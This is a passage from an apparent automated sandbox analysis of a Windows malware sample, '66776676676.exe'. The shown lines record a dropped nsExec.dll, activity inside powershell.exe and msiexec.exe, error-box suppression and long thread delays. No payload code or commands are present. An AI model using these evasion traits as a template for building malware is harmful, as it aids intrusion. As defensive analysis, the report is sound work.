Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CC0FC4 push es; iretd	1_2_07CC0FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CCB54E push FFFFFF8Bh; iretd	1_2_07CCB551
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CC0D51 push FFFFFF8Bh; iretd	1_2_07CC0D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CC1891 push FFFFFF8Bh; iretd	1_2_07CC189A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CCB648 push FFFFFF8Bh; iretd	1_2_07CCB64B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09633E39 push 8BD38B50h; iretd	1_2_09633E3E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272891E pushad ; iretd	6_2_0272891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02728C2F pushfd ; iretd	6_2_02728C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02728DDF push esp; iretd	6_2_02728DE0

Source: C:\Users\user\Desktop\66776676676.exe

File created: C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597912	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597574	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595062	Jump to behavior
